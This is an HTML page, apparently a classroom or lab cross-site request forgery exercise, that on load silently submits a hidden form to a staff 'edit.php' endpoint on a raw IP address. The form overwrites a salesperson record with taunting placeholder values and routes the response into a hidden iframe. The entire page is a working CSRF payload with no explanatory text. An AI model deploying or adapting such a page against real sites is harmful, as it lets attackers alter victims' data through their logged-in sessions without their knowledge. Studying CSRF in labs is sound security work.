<html>
  <head>
    <title>Fake Page</title>
  </head>
  <body onload="document.my_form.submit()">
    <form action="https://35.184.199.7/red/public/staff/salespeople/edit.php?id=5" method="POST" name="my_form" style="display: none;" target="hidden_results" >
      <input type="text" name="first_name" value="This is a fake page" />
      <input type="text" name="last_name" value="Your dumb" />
      <input type="text" name="phone" value="123-456-7891" />
      <input type="text" name="email" value="DummyEmail@email.com" />
    </form>
    <iframe name="hidden_results" style="display: none;"></iframe>
  </body>
</html>
